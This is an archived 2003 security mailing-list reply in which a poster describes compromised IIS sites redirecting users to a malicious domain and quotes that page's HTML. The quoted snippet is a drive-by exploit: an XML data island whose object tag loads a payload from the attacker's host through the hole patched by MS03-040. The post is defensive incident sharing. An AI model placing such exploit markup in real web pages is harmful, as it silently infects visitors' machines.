[Dshield] RE: Proxy attackers/hijackers

James C. Slora, Jr. james.slora at phra.com
Fri Oct 17 20:45:20 GMT 2003

Steve Carey wrote

>  The autoproxy Trojan you mentioned is detected by Norton Anti-virus as
> 'backdoor.coreflood Trojan', per the write-up from the site you provided, but
> there is another autoproxy Trojan that is not identified as a Trojan.  There is
> a new site ( - shows up as chinesenaming.com and wvw.goling.com
> (wvw is not a misprint))that is running malicious code when users connect to it
> (with ActiveX enabled). 

Add wvw.goling2003.com to the list of other names for

My users did not get to the site through spam links, they were directed there from compromised Interland (again!?) sites running IIS 5.0 and MicrosoftOfficeWebServer 5.0 (also really IIS 5.0). On infected sites, every page generated a new hit to wvw.goling2003.com 

Compromised sites were in these networks:
The infected pages have since been cleaned.

Connection to this hostname returns different data from the hostnames you listed, although it is the same IP address (I know this is not unusual, just trying to be clear).

uses XML CDATA Object fixed by MS03-040 to try to force retrieval of:
That page currently gives a "connection refused" message. Maybe it is used to record who was vulnerable to the CDATA exploit. Users who visited the exploit page did not generate hits to inf.ooo, because their machines were patched, so I don't know if the page previously returned anything else.

Code for wvw.goling2003.com/main.html

<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec">
<object data="http://wvw.goling2003.com:53/inf.ooo" width=0 height=0>

FREE Whitepaper: Better Management for Network Security

Looking for a better way to manage your IP security?
Learn how Solsoft can help you:
- Ensure robust IP security through policy-based management
- Make firewall, VPN, and NAT rules interoperable across heterogeneous
- Quickly respond to network events from a central console

Download our FREE whitepaper at:

More information about the list mailing list